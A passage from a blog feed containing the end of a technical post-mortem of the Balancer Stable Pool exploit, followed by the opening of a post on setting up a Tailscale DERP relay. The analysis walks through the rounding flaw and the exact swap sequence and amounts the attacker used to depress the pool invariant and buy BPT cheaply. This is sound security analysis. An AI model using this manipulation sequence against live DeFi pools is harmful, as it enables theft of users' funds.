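</p><p>To put a rough bound on this rounding loss, here is a sketch in this article’s notation, where $a$ is the raw amount and $s$ is the 18-decimal scaling factor (the symbol $\varepsilon$ is introduced here only for illustration). <code>mulDown</code> computes</p><p>$$\text{mulDown}(a, s) = \left\lfloor \frac{a \cdot s}{10^{18}} \right\rfloor = \frac{a \cdot s}{10^{18}} - \varepsilon,\quad \varepsilon \in [0, 1)$$</p><p>so the absolute loss is always below one unit of the scaled amount, while the relative loss $\varepsilon \cdot 10^{18} / (a \cdot s)$ depends entirely on how large $a$ is. With $a = 9$ and $s = 1.1 \times 10^{18}$ the loss is $0.9$ out of an exact $9.9$, about 9% of the exact value (or 10% of the truncated result 9). With $a = 10^{18} + 1$ and the same $s$, the exact product is $1.1 \times 10^{18} + 1.1$, so $\varepsilon = 0.1$ and the relative loss is on the order of $10^{-19}$.</p><p>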
Second, the logic of multiplying by tokenRate in the _scalingFactors calculation process is also not problematic, because Linear Pool has similar logic, but Linear Pool is not within the scope of this attack:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-linear/contracts/LinearPool.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_scalingFactor</span>(<span class="params">IERC20 token</span>) internal view virtual <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="keyword">if</span> (token == _mainToken) &#123;</span><br><span class="line">        <span class="keyword">return</span> _scalingFactorMainToken;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (token == _wrappedToken) &#123;</span><br><span class="line">        <span class="comment">// The wrapped token&#x27;s scaling factor is not constant, but increases over time as the wrapped token</span></span><br><span class="line">        <span class="comment">// increases in value.</span></span><br><span class="line">        <span class="keyword">return</span> _scalingFactorWrappedToken.<span class="title function_">mulDown</span>(<span class="title function_">_getWrappedTokenRate</span>()); <span class="comment">// &lt;--------</span></span><br><span class="line">    &#125; <span 
class="keyword">else</span> <span class="keyword">if</span> (token == <span class="variable language_">this</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">FixedPoint</span>.<span class="property">ONE</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="title function_">_revert</span>(<span class="title class_">Errors</span>.<span class="property">INVALID_TOKEN</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>So where is the problem??? It’s time to learn about the Stable Pool’s mathematical model.</strong></p><h3 id="2-Stable-Pool-Mathematical-Model">2. Stable Pool Mathematical Model</h3><blockquote><p>This section introduces the Stable Pool’s mathematical model. For learning purposes, it involves additional background knowledge, and not all content is related to the vulnerability.</p></blockquote><p>During the swap process, the control flow will enter the specific swap share calculation logic through the call chain <code>BaseGeneralPool._swapGivenOut → ComposableStablePool._onSwapGivenOut → ComposableStablePool._onRegularSwap</code>:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span 
class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Perform a swap between non-BPT tokens. Scaling and fee adjustments have been performed upstream, so</span></span><br><span class="line"><span class="comment"> * all we need to do here is calculate the price quote, depending on the direction of the swap.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_onRegularSwap</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bool isGivenIn,</span></span><br><span class="line"><span class="params">    uint256 amountGiven,</span></span><br><span class="line"><span class="params">    uint256[] memory registeredBalances,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexIn,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexOut</span></span><br><span class="line"><span class="params"></span>) private view <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// Adjust indices and balances for BPT token</span></span><br><span class="line">    uint256[] memory balances = <span class="title function_">_dropBptItem</span>(registeredBalances);</span><br><span class="line">    uint256 indexIn = <span class="title function_">_skipBptIndex</span>(registeredIndexIn);</span><br><span class="line">    uint256 indexOut = <span class="title function_">_skipBptIndex</span>(registeredIndexOut);</span><br><span class="line"></span><br><span class="line">    (uint256 currentAmp, ) = <span class="title 
function_">_getAmplificationParameter</span>();</span><br><span class="line">    uint256 invariant = <span class="title class_">StableMath</span>.<span class="title function_">_calculateInvariant</span>(currentAmp, balances);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (isGivenIn) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">StableMath</span>.<span class="title function_">_calcOutGivenIn</span>(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">StableMath</span>.<span class="title function_">_calcInGivenOut</span>(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Here we can see several functions used to calculate swap amounts:</p><ul><li>_getAmplificationParameter: Gets the amplification factor, a hyperparameter that administrators can change smoothly over time</li><li>_calculateInvariant: Calculates the invariant D</li><li>_calcOutGivenIn/_calcInGivenOut: Based on the previously calculated invariant D and the swap direction, calculates either how many tokenOut the user receives for amountGiven tokenIn (_calcOutGivenIn) or how many tokenIn the user must pay for amountGiven tokenOut (_calcInGivenOut)</li></ul><p>Automated Market Makers (AMMs) generally need to satisfy the formula $f(\mathbf{B}^{\text{prev}}; \boldsymbol{\theta})=f(\mathbf{B}^{\text{after}}; \boldsymbol{\theta})=D$ so that token exchange prices adjust automatically as trades happen.</p><blockquote><p>Where $\mathbf{B} = (B_1, B_2, \dots)$ represents the balances of multiple tokens (<strong>note that the balances here are values after multiplying by Token Rate</strong>), $\boldsymbol{\theta}=(\theta_1,\theta_2, \dots)$ represents 
hyperparameters (the AmplificationParameter above is a hyperparameter), and $D$ is the invariant of the formula. Token balance changes maintain price stability through the invariant.</p></blockquote><p>Different token pairs have different price behaviors and risk characteristics, so the invariant function f also needs to vary with market structure. For Stable Pools, since stablecoin exchange relationships are usually maintained at fixed ratios over the long term, such as 1:1, it’s natural to want the pool to have as much liquidity depth as possible near this price critical point, so that even large-scale trades won’t cause significant price volatility, thereby reducing slippage and improving trading experience. At the same time, when prices significantly deviate from this fixed ratio, prices must have sufficient sensitivity so that the cost of continuing to trade rises rapidly, preventing one side of assets from being over-drained and providing arbitrageurs with motivation to restore price anchoring. 
The effect is roughly like this:</p><ul><li><p><strong>Price-Liquidity Chart</strong>: We can see that liquidity is very high near price 1.0, because stablecoin prices themselves move only slightly; liquidity further from that price is relatively low.</p><p><img src="/2025/11/balancer-128m-exploit-analysis/price-liquidity.png" alt="price-liquidity.png"></p></li><li><p><strong>TokenA Liquidity-TokenB Liquidity Chart</strong> (50/50 Stable Pool): Roughly the effect of the orange line in the chart, approaching a constant sum line near 0.5, and approaching a constant product line in extreme situations.</p><blockquote><p>The chart was drawn with ChatGPT, so it is only meant to give readers a general impression, and its mathematical formulas should not be scrutinized in detail.</p></blockquote><p><img src="/2025/11/balancer-128m-exploit-analysis/reservePrice.png" alt="reservePrice.png"></p></li></ul><p>Therefore, <strong>the invariant function adopted by Stable Pool is not simply a constant sum model or constant product model</strong>, but rather achieves a continuous transition between the two by introducing hyperparameters such as the amplification factor:</p><ul><li>When prices are near the anchoring interval, its behavior is closer to the constant sum curve x + y = k, providing nearly stable exchange rates</li><li>As prices gradually deviate from this interval, the invariant function gradually degenerates toward the constant product curve x * y = k, making the price curve steeper and strengthening the system’s safety and robustness in extreme situations</li></ul><p>The <code>_calculateInvariant</code> function solves the following invariant equation, where:</p><p>$$A n^{n} S + D = A D n^{n}+\frac{D^{n+1}}{n^{n} P},\quad S = \sum_{i=1}^{n} x_i,\quad P = \prod_{i=1}^{n} x_i $$</p><ul><li>A: <strong>Amplification factor</strong>, a hyperparameter.</li><li>n: <strong>Total number</strong> of tokens.</li><li>S: <strong>Sum</strong> of all token 
balances.</li><li>P: <strong>Product</strong> of all token balances.</li><li>D: The <strong>invariant</strong> mentioned above that must be maintained during token swaps, <strong>the value to be calculated</strong>.</li></ul><blockquote><p>Note: The mathematical formulas here are not related to the exploitation of the vulnerability. Readers who are not interested can skip them.</p></blockquote><p>Two limiting cases follow:</p><ul><li><strong>Pool is near equilibrium</strong>: For example, when all balances satisfy $x_i \approx \frac{D}{n}$, we have $P \approx \left(\frac{D}{n}\right)^n$. The term amplified by A then dominates the equation, and the solution approaches $D \approx S$, i.e., $x_1 + x_2 + \cdots + x_n \approx D$. Near the anchoring price, the pool therefore behaves like the constant sum model, with an almost linear price curve and minimal slippage, which corresponds to the region of high liquidity and stable prices.</li><li><strong>A token balance approaches zero</strong>: For example, if $x_k \to 0$, then $P = \prod_{i=1}^{n} x_i \to 0$. The term $\frac{D^{n+1}}{n^{n} P}$ then becomes extremely large and dominates the equation, so that approximately $D^{n+1} \propto P$. The pool thus degenerates to constant-product-like behavior in boundary regions, where prices change drastically with trading volume and slippage increases rapidly, which effectively prevents a single asset from being completely drained.</li></ul><p>In the invariant formula used by <code>_calculateInvariant</code>, <strong>the independent variables are the token balances, and the dependent variable is the invariant D.</strong> To solve for D, the <code>_calculateInvariant</code> function applies the Newton–Raphson iteration $D_{k+1} = D_k - \frac{f(D_k)}{f'(D_k)}$ for up to 255 iterations. 
More specific mathematical details won’t be expanded here; interested readers can consult ChatGPT for more explanations.</p><p>After calculating the invariant D, the <code>_calcInGivenOut</code> function rearranges the invariant formula above into the quadratic $x^2 + \left( S_{\setminus x} + \frac{D}{A \cdot n^n} - D \right) x - \frac{D^{n+1}}{A \cdot n^{2n} \cdot P_{\setminus x}} = 0$ and solves it for x, where:</p><ul><li>$x$: the <strong>new balance of tokenIn after tokenIn flows in, i.e., $x=B_x + Amount_{in}$</strong>, where $Amount_{in}$ is the value that <code>_calcInGivenOut</code> ultimately needs to find. <strong>The value to be calculated</strong>.</li><li>$S_{\setminus x}$: the sum of the balances of all tokens other than tokenIn.</li><li>$P_{\setminus x}$: the product of the balances of all tokens other than tokenIn.</li></ul><p>After the expected new balance of tokenIn has been calculated, subtracting the current balance yields $Amount_{in}$, the amount of tokenIn that the user must pay.</p><p><strong>So how is the BPT price calculated?</strong> The <strong>BPT price is proportional to the invariant D</strong>: $P_{BPT} = \frac{D}{S_{BPT}}$, where $P_{BPT}$ is the BPT price and $S_{BPT}$ is the total supply of BPT. Note, however, that although D is called an invariant, it is not constant over the lifetime of the pool. 
See the code comments below for details, which won’t be expanded here.</p><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function returns the appreciation of BPT relative to the underlying tokens, as an 18 decimal fixed</span></span><br><span class="line"><span class="comment"> * point number. 
It is simply the ratio of the invariant to the BPT supply.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The total supply is initialized to equal the invariant, so this value starts at one. During Pool operation the</span></span><br><span class="line"><span class="comment"> * invariant always grows and shrinks either proportionally to the total supply (in scenarios with no price impact,</span></span><br><span class="line"><span class="comment"> * e.g. proportional joins), or grows faster and shrinks more slowly than it (whenever swap fees are collected or</span></span><br><span class="line"><span class="comment"> * the token rates increase). Therefore, the rate is a monotonically increasing function *as long as the tokens</span></span><br><span class="line"><span class="comment"> * in the pool do not lose value*.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * ...</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">getRate</span>(<span class="params"></span>) external view virtual override <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// We need to compute the current invariant and actual total supply. 
The latter includes protocol fees that have</span></span><br><span class="line">    <span class="comment">// accrued but are not yet minted: in calculating these we&#x27;ll actually end up fetching most of the data we need</span></span><br><span class="line">    <span class="comment">// for the invariant.</span></span><br><span class="line"></span><br><span class="line">    (</span><br><span class="line">        uint256[] memory balances,</span><br><span class="line">        uint256 virtualSupply,</span><br><span class="line">        uint256 protocolFeeAmount,</span><br><span class="line">        uint256 lastJoinExitAmp,</span><br><span class="line">        uint256 currentInvariantWithLastJoinExitAmp</span><br><span class="line">    ) = <span class="title function_">_getSupplyAndFeesData</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Due protocol fees will be minted at the next join or exit, so we can simply add them to the current virtual</span></span><br><span class="line">    <span class="comment">// supply to get the actual supply.</span></span><br><span class="line">    uint256 actualTotalSupply = virtualSupply.<span class="title function_">add</span>(protocolFeeAmount);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// All that&#x27;s missing now is the invariant. 
We have the balances required to calculate it already, but still</span></span><br><span class="line">    <span class="comment">// need the current amplification factor.</span></span><br><span class="line">    (uint256 currentAmp, ) = <span class="title function_">_getAmplificationParameter</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// It turns out that the process for due protocol fee calculation involves computing the current invariant,</span></span><br><span class="line">    <span class="comment">// except using the amplification factor at the last join or exit. This would typically not be terribly useful,</span></span><br><span class="line">    <span class="comment">// but since the amplification factor only changes rarely there is high probability of its current value being</span></span><br><span class="line">    <span class="comment">// the same as it was in the last join or exit. If that is the case, then we can skip the costly invariant</span></span><br><span class="line">    <span class="comment">// computation altogether.</span></span><br><span class="line">    uint256 currentInvariant = (currentAmp == lastJoinExitAmp)</span><br><span class="line">        ? currentInvariantWithLastJoinExitAmp</span><br><span class="line">        : <span class="title class_">StableMath</span>.<span class="title function_">_calculateInvariant</span>(currentAmp, balances);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// With the current invariant and actual total supply, we can compute the rate as a fixed-point number.</span></span><br><span class="line">    <span class="keyword">return</span> currentInvariant.<span class="title function_">divDown</span>(actualTotalSupply);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="3-Attack-Flow">3. 
Attack Flow</h3><p>In the first subsection, we saw that passing a very small value to the <code>_upscale</code> function causes significant precision loss in the result, but we still <strong>haven’t figured out how a discrepancy of a few wei can be used to steal large amounts of funds</strong>. In the second subsection, we looked in detail at the Stable Pool’s invariant formula and at how the BPT price is calculated.</p><p>Let’s review:</p><ol><li>The Stable Pool’s mathematical model is a blend of constant sum and constant product: it behaves like x + y = k near the anchoring price, and <strong>like x * y = k far from the anchoring price</strong>.</li><li>The invariant D is calculated from each token’s balance, so <strong>the invariant D must be positively correlated with each token’s balance</strong>. The intuition is simple: when LPs add liquidity, token balances increase, so D must also increase to back the newly minted BPT. Conversely, when LPs withdraw liquidity, token balances decrease, and D decreases accordingly.</li><li><strong>The BPT price is derived from the invariant D and the current total supply</strong>. If the total supply remains unchanged and D can be reduced through the vulnerability, then BPT can be bought at a lower-than-normal price.</li></ol><p>The attack idea now becomes clear: <strong>during each swap, the invariant D is calculated from the token balances. If precision loss in scaling those balances makes the calculated D smaller (while the BPT total supply stays unchanged), the attacker can buy BPT at a lower price, because the BPT price depends directly on D</strong>.</p><p>The <a href="https://app.blocksec.com/explorer/tx/arbitrum/0x7da32ebc615d0f29a24cacf9d18254bea3a2c730084c690ee40238b1d8b55773">example attack transaction on Arbitrum</a> shows the full attack flow. 
We can see that the attacker exploited the precision loss in the <code>_upscale</code> function to push the calculated D away from its normal value, which in turn distorted the BPT price. Specifically, the attack flow is as follows.</p><ol><li><p><strong>Liquidity Manipulation</strong>. Balancer’s batchSwap allows internal balances to be borrowed temporarily, so the attacker first borrowed BPT from this pool, then swapped the BPT for the underlying tokens rETH/cbETH/wstETH. After many swaps, the pool’s balances of these tokens dropped from the 1e19 to 1e20 wei range to only about 1e11 wei:</p><p><img src="/2025/11/balancer-128m-exploit-analysis/image.png" alt="image.png"></p><p>In the figure above, the TokenIn labeled <code>wstETH/rETH/cbETH</code> is actually the BPT of this pool (because the BPT address is the pool’s address). From top to bottom, the amount of underlying assets swapped out shrinks by orders of magnitude, until the final swap amount is below 100 wei. 
Looking at the balance changes, the token amounts at the start of the swaps were:</p><ul><li><strong>cbETH: 385e18</strong> (385,331,897,945,415,101,145)</li><li><strong>BPT: 2.45e18</strong> + 2^111 (2,596,148,429,267,416,263,499,288,948,276,786)</li><li><strong>wstETH: 36.4e18</strong> (36,378,350,238,858,588,950)</li><li><strong>rETH: 41.3e18</strong> (41,301,528,246,890,260,702)</li></ul><blockquote><p>Note: The 2^111 portion of the BPT balance is <code>_PREMINTED_TOKEN_BALANCE</code>; see the code for details.</p></blockquote><p>After the liquidity manipulation, the final token amounts were:</p><ul><li><strong>cbETH: 1.00e11</strong> (100,000,000,000)</li><li><strong>BPT: 501.96e18</strong> + 2^111 (2,596,148,429,267,915,775,463,860,923,420,341)</li><li><strong>wstETH: 1.00e11</strong> (100,000,000,000)</li><li><strong>rETH: 1.00e11</strong> (100,000,000,000)</li></ul></li><li><p>Repeatedly compressing the invariant D through the rounding vulnerability. This step only involves wstETH/cbETH swaps. The attacker repeats the following three swaps:</p><ol><li>wstETH→cbETH: This step exhausts wstETH liquidity, reducing it from about 1e11 to the critical value of 9.</li><li><strong>wstETH→cbETH: This step uses a carefully constructed amount = 8, triggering precision loss in upscale.</strong> At this point, cbETH’s token rate is 1.114. Therefore, before the invariant D is calculated, upscale computes <code>balance(8) * rate(1.114) = value(8.912)</code> and truncates it to <strong>8</strong>. 
As a result, the invariant D is computed from the truncated balance, so the calculated D is maliciously pushed downward.</li><li>cbETH→wstETH: With D compressed by the previous step, this swap simply restores wstETH liquidity from 1 to a higher value such as 5642, preparing for the next round, which starts again from the first sub-step.</li></ol><p><img src="/2025/11/balancer-128m-exploit-analysis/image%201.png" alt="image.png"></p></li><li><p>Because repeated rounding attacks have compressed the invariant D to a very small value, the attacker can buy back BPT at a lower price to repay the internal balances borrowed through the Vault’s batchSwap. The difference between the BPT price before and after the manipulation determines how much the attacker steals. The figure below shows the swaps in which the attacker spends the underlying tokens cbETH/wstETH/rETH to buy back BPT. The buy-back amount grows exponentially from one swap to the next, so that the BPT initially borrowed from the Vault to deplete the pool’s liquidity is repaid quickly.</p><p><img src="/2025/11/balancer-128m-exploit-analysis/image%202.png" alt="image.png"></p></li></ol><h2 id="IV-References">IV. 
References</h2><ol><li><a href="https://www.coinspect.com/blog/balancer-rate-manipulation-exploit/">https://www.coinspect.com/blog/balancer-rate-manipulation-exploit/</a></li><li><a href="https://blocksecteam.medium.com/in-depth-analysis-the-balancer-v2-exploit-9552f6442437">https://blocksecteam.medium.com/in-depth-analysis-the-balancer-v2-exploit-9552f6442437</a></li><li><a href="https://www.openzeppelin.com/news/understanding-the-balancer-v2-exploit">https://www.openzeppelin.com/news/understanding-the-balancer-v2-exploit</a></li><li><a href="https://mp.weixin.qq.com/s/zywPIK08hpy-Ug6rc9Qysw">https://mp.weixin.qq.com/s/zywPIK08hpy-Ug6rc9Qysw</a></li><li><a href="https://x.com/Balancer/status/1986104426667401241">https://x.com/Balancer/status/1986104426667401241</a></li></ol></div><script>/* Read a URL query parameter */ function getUrlParameter(name) {  name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');  var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');  var results = regex.exec(location.search);  return results === null ? 
'' : decodeURIComponent(results[1].replace(/\+/g, ' '));} /* Update a URL query parameter (without reloading the page) */ function updateUrlParameter(param, value) {  var url = new URL(window.location);  url.searchParams.set(param, value);  window.history.replaceState({}, '', url);}function switchLang(lang, updateUrl) {  const zhContent = document.getElementById('content-zh');  const enContent = document.getElementById('content-en');  const zhBtn = document.getElementById('lang-zh');  const enBtn = document.getElementById('lang-en');    if (lang === 'zh') {    zhContent.style.display = 'block';    enContent.style.display = 'none';    zhBtn.style.background = '#007bff';    enBtn.style.background = '#6c757d';    localStorage.setItem('preferred-lang', 'zh');  } else {    zhContent.style.display = 'none';    enContent.style.display = 'block';    zhBtn.style.background = '#6c757d';    enBtn.style.background = '#007bff';    localStorage.setItem('preferred-lang', 'en');  }    /* Update the URL parameter (if requested) */  if (updateUrl !== false) {    updateUrlParameter('lang', lang);  }    /* Regenerate the TOC (if the TOC feature is enabled) */  if (typeof window.initTocbot === 'function') {    setTimeout(function() {      window.initTocbot();    }, 100);  }} /* Restore the user's language choice on page load */ document.addEventListener('DOMContentLoaded', function() {  /* Priority: URL parameter > localStorage > default (Chinese) */  var urlLang = getUrlParameter('lang');  var savedLang = localStorage.getItem('preferred-lang');  var defaultLang = 'zh';    var langToUse = urlLang || savedLang || defaultLang;    /* Validate the language parameter */  if (langToUse !== 'zh' && langToUse !== 'en') {    langToUse = defaultLang;  }    /* If the URL carries the parameter, sync it to localStorage */  if (urlLang && (urlLang === 'zh' || urlLang === 'en')) {    localStorage.setItem('preferred-lang', urlLang);  }    /* Switch language (without updating the URL, since it is already there or needs no update) */  switchLang(langToUse, false);});</script>]]></content>
    
    
    <summary type="html">&lt;div class=&quot;lang-switcher&quot; style=&quot;text-align: center; margin: 20px 0;&quot;&gt;
  &lt;button id=&quot;lang-zh&quot; onclick=&quot;switchLang(&#39;zh&#39;)&quot; style=&quot;padding: 8px 16px; margin: 0 5px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer;&quot;&gt;中文&lt;/button&gt;
  &lt;button id=&quot;lang-en&quot; onclick=&quot;switchLang(&#39;en&#39;)&quot; style=&quot;padding: 8px 16px; margin: 0 5px; background: #6c757d; color: white; border: none; border-radius: 4px; cursor: pointer;&quot;&gt;English&lt;/button&gt;
&lt;/div&gt;
&lt;div id=&quot;content-zh&quot; class=&quot;lang-content lang-content-zh&quot; style=&quot;display: block;&quot;&gt;
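&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;On November 3, 2025, attackers exploited arithmetic precision loss in the Balancer pool invariant calculation to steal $128 million from six blockchain networks in less than 30 minutes.&lt;/strong&gt; I was very interested in this attack, but most existing write-ups online cover only very limited technical details, such as the precision loss in the _upscaleArray logic or one or two adjacent levels of the call chain, which is not friendly to readers who are not yet familiar with Balancer internals. So I wanted to organize all the relevant details properly and take the opportunity to learn the Balancer protocol.&lt;/p&gt;&lt;/div&gt;</summary>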
    
    
    
    
    <category term="Blockchain" scheme="https://kiprey.github.io/tags/Blockchain/"/>
    
    <category term="exploit" scheme="https://kiprey.github.io/tags/exploit/"/>
    
  </entry>
  
  <entry>
    <title>A Brief Look at the Tailscale DERP Relay Service</title>
    <link href="https://kiprey.github.io/2023/11/tailscale-derp/"/>
    <id>https://kiprey.github.io/2023/11/tailscale-derp/</id>
    <published>2023-11-13T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.129Z</updated>
    
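    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>Tailscale is a very handy tool, mainly used to network machines across different locations, and it ships with several advanced features (such as Magic DNS) that make it convenient to use.</p><blockquote><p>This is also why I dropped Zerotier in favor of Tailscale: it has many advanced features and they are easy to use.</p></blockquote><p>Tailscale’s underlying mechanism differs from Zerotier’s.</p><ul><li>Zerotier makes every client <strong>attempt hole punching with the other clients as soon as it starts</strong>, and keeps those connections alive.<ul><li>Pros: connections are established very quickly. Either the hole has already been punched, or it is already known for certain that traffic must go through a relay node.</li><li>Cons: hole-punched links to all peers must be maintained, which consumes resources. The more nodes there are, the higher the maintenance overhead.</li></ul></li><li>Tailscale <strong>only attempts hole punching when it needs to connect to a peer</strong>, and the initial traffic always goes through a DERP relay server. (Very lazy…)<ul><li>Pros: thanks to lazy loading, no hole-punched connections to other nodes and no state need to be maintained in advance.</li><li>Cons: every time a virtual connection is created through Tailscale, <strong>the initial connection has high latency</strong>, which greatly hurts the user experience; <strong>Tailscale depends heavily on relay nodes</strong>.</li></ul></li></ul><p>In a P2P VPN, a <strong>self-hosted relay node</strong> is quite important. On the one hand, a self-hosted relay can <strong>observe and coordinate the P2P process between two local peers better</strong> than a geographically distant official relay; on the other hand, it can <strong>quickly relay and forward traffic</strong> when hole punching fails.</p><p>A previous article of mine covered the principles and process of setting up a Zerotier relay node (Moon). Zerotier listens for UDP connections on its primary port 9993 to relay data, so in practice <strong>only this one UDP port needs to be exposed to the public internet</strong>, which is a very low bar. There are many ways to expose a port, such as NAT traversal with FRP, so <em>a moon node does not even need an IP address of its own</em>.</p><blockquote><p>Note: Zerotier does not support self-hosted TCP relays; a moon node is really just a UDP relay node.</p></blockquote><p>Setting up Tailscale’s relay server (called the DERP service) is somewhat harder than with Zerotier, and the tutorials available online vary wildly in quality (just as painful as when I was looking for Zerotier Moon setup guides, which deserves a serious rant). So next, let’s try to find the simplest way to build a Tailscale DERP server, and learn some of the principles behind the DERP service along the way.</p><blockquote><p>Tailscale’s DERP relay service is a <strong>TCP</strong> relay node, the exact opposite of Zerotier.</p></blockquote><p><strong>TL;DR</strong>: to skip the background and go straight to the setup process, jump to the <strong>summary</strong> in the last section of this article.</p><p>After reading this article, you will know how to quickly build a Tailscale DERP service with <strong>just 1-2 ports</strong> and <strong>without a public-facing machine, a domain name, a certificate, source code modifications, or a self-hosted HeadScale service</strong>.</p><blockquote><p>Note that this article only considers Tailscale, not Headscale, because I want the setup to be as simple as possible and do not want to deploy a separate Headscale control server.</p></blockquote><span id="more"></span><h2 id="二、初探-DERP-服务的初始要求">II. A First Look at the DERP Service Requirements</h2><p>The <a href="https://tailscale.com/kb/1118/custom-derp-servers/#why-run-your-own-derp-server">official Tailscale documentation</a> states that a DERP
server needs to meet several requirements:</p><ol><li><p><strong>It must be publicly reachable</strong>. This lets every Tailscale node access the DERP server directly so that it can forward traffic later. This requirement is perfectly reasonable.</p></li><li><p><strong>It must run an HTTPS service</strong>. Essentially, this ensures that data sent to the DERP server is encrypted with TLS.</p><blockquote><p>An HTTPS service usually needs <strong>a TLS certificate</strong>. The DERP server only recognizes certificates issued by <em>Let’s Encrypt</em>, which does not issue certificates for bare-IP servers. This implies one more condition: <strong>a public domain name is also required</strong>.</p></blockquote><blockquote><p>The TLS encryption here is different from Tailscale’s P2P encryption: the former encrypts peer-to-server traffic, while the latter encrypts peer-to-peer traffic. In other words, the data encrypted by TLS contains the <em>encrypted traffic to be relayed</em> (already encrypted by the Tailscale peer).</p></blockquote></li><li><p><strong>Port 80 must be allocated to run an HTTP service</strong>. This is a strict requirement that pins the port.</p></li><li><p><strong>Two additional ports must be exposed to run the HTTPS and STUN services</strong>.</p></li><li><p><strong>ICMP traffic must be allowed in and out</strong>. The Tailscale documentation uses <em>must</em> to stress its importance, but I personally feel this requirement should not be necessary.</p></li></ol><p>The requirements summarized from the documentation above may not be entirely accurate, because some articles online describe setting up a bare-IP DERP server (though they explain nothing, so reading them is no better than not reading them…). From my experience reading the code, however, <strong>this part of the official documentation is very likely outdated, and such strict requirements should not actually be needed</strong>.</p><p>Note that the DERP service requires the server to carry a TLS certificate mainly for data encryption; but two Tailscale nodes already encrypt their data before transmission, using the public keys that each node uploaded beforehand to the Tailscale central node (i.e., the coordination server). Therefore, the real role of the TLS certificate required by the DERP server is to <strong>hide the act of relaying itself</strong>. Since my self-hosted node is mainly for my own use, this hiding does not matter much.</p><p>This raises an interesting question:</p><blockquote><p>Can a DERP relay be set up with <strong>the fewest steps and the fewest requirements</strong>?</p></blockquote><p>To answer that, we need to dig into how DERP is implemented.</p><h2 id="三、初探-DERP-原理">III. A First Look at How DERP Works</h2><blockquote><p>The Tailscale version used here is v1.52.1 (2023/11/11), git commit <a href="https://github.com/tailscale/tailscale/commit/86c8ab7502a38b4de05308355fe0c847e4e78167">86c8ab75.</a></p></blockquote><h3 id="1-DERP-配置相关">1. 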
DERP Configuration</h3><p>The top-level DERP implementation consists mainly of two files:</p><ul><li><a href="https://github.com/tailscale/tailscale/blob/86c8ab75/cmd/derper/derper.go">cmd/derper/derper.go</a>: the top-level entry point of the DERP server; all the logic for listening for the STUN service lives here as well</li><li><a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go">derp/derp_server.go</a>: the code that implements relaying and forwarding data</li></ul><p>The DERP server code reveals a few interesting things:</p><ol><li><p>A DERP server can run two services at the same time: the DERP data relay service over <strong>HTTP/HTTPS</strong> (TCP), and the STUN hole-punching service over UDP.</p><blockquote><p>These two services happen to use different transport-layer protocols, so the approach used for Zerotier should carry over.</p></blockquote></li><li><p>The bind IP, the HTTP/HTTPS (DERP service) listen port, the choice between HTTP and HTTPS, and the STUN listen port are all configurable, which is very flexible.</p></li><li><p>The <code>verify-clients</code> flag restricts use of this DERP service to your own Tailscale nodes, which prevents freeloading. Enabling it, however, requires that the DERP server itself be a Tailscale node, or that the socket file <code>/var/run/tailscale/tailscaled.sock</code> exist.</p></li></ol><figure class="highlight go"><table><tr><td class="code"><pre><span class="line"><span class="comment">// cmd/derper/derper.go</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> (</span><br><span class="line">dev        = flag.Bool(<span 